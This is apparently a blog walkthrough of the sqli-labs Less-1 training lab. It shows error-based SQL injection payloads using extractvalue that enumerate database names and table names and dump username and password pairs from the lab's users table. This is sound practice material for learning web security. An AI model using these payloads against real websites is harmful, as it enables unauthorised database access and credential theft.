当前位置:网站首页>Sqli labs less-1 (extractvalue of error injection)
Sqli labs less-1 (extractvalue of error injection)
2022-07-19 00:46:00 【Unknown white hat】
Catalog
less-1( Error reporting injection extractvalue)
3 Blast security All table names for
4. Inquire about users The third line of data
less-1( Error reporting injection extractvalue)
1. principle
2. Blast all silos
All database names
?id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))-- -
?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),1,31) from information_schema.schemata)))-- - # The letter limit can only be displayed 31 individual
?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),32,31) from information_schema.schemata)))-- -
?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata)))-- -
3 Blast security All table names for
Security All table names for
?id=1’ and extractvalue(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema=’security’),0x7e))-- -
4. Inquire about users The third line of data
?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users where id=3),0x7e))-- -
边栏推荐
- 我的创作纪念日
- 业务太忙,真的是没时间搞自动化理由吗?
- @ConditionalOnMissingBean 如何实现覆盖第三方组件中的 Bean
- Lead friends on the whole network to complete chalk login encryption analysis, and change the way to play again
- Glide source code analysis (4.13.2)
- 【无标题】
- Arrow function of ES6
- International Conference on Sustainable hydraulic science and green infrastructure 18-19
- Use protobuf in the program
- [paper notes] - feature visualization - zfnet - 2014-eccv
猜你喜欢
uml类图浅录
微信小程序开发学习2(模板与配置)
Hcia-r & s self use notes (10) VRP foundation, command, remote management
Glide source code analysis (4.13.2)
![[untitled]](/img/e1/01e7a5bf3976a4434cdc91647b684d.png)
[untitled]
Google Chrome OS officially changed its name to Chrome OS brand
Visionmaster communicates MODBUS with youao robot ur5e
![[Vulnhub] Raven-2 (mysql-UDF提权)](/img/10/68f77c6f8a99be13de3e45cc08287a.png)
[Vulnhub] Raven-2 (mysql-UDF提权)
QT tools - MOC, RCC, UIC
![[JS] webapi --- the first bullet](/img/32/fba99c94e3b7f9eb38002335703e1b.png)
[JS] webapi --- the first bullet
随机推荐
What are the advantages of using gtid to configure replication relative to coordinate position
有的小伙伴问我英语不好可以学编程吗?
【无标题】
2022-07-15 advanced network engineering (XIX) BGP state machine, interaction principles between peers, factors affecting the establishment of peer relations, peer table, routing table, detailed routin
CodeTON Round 1 (Div. 1 + Div. 2, Rated, Prizes)(A-C)
baomidou Page 这个page是从1 开始的 ,jpa的是从0 开始的
A brief record of UML class diagram
Mon anniversaire de création
MySQL's redolog and binlog
What do LETV employees rely on to live a "fairy life" without a boss?
Rocky foundation shell script create Yum source
[sort] insert sort, Hill sort and heap sort
利用numpy实现卷积操作
Strength certification | Haitai Fangyuan is strongly listed in the top 20 fields of "roar 2022 network security industry map"
Introduction to promise module in nodejs
带领全网朋友,完成粉笔登录加密分析,再次换种玩法
双指针汇总(未完待续)
NXP i.MX8M Plus赋能边缘机器学习,启扬IAC-IMX8MP-Kit开发板
International Conference on Sustainable hydraulic science and green infrastructure 18-19
Software test interview question collection -- continuous summary and update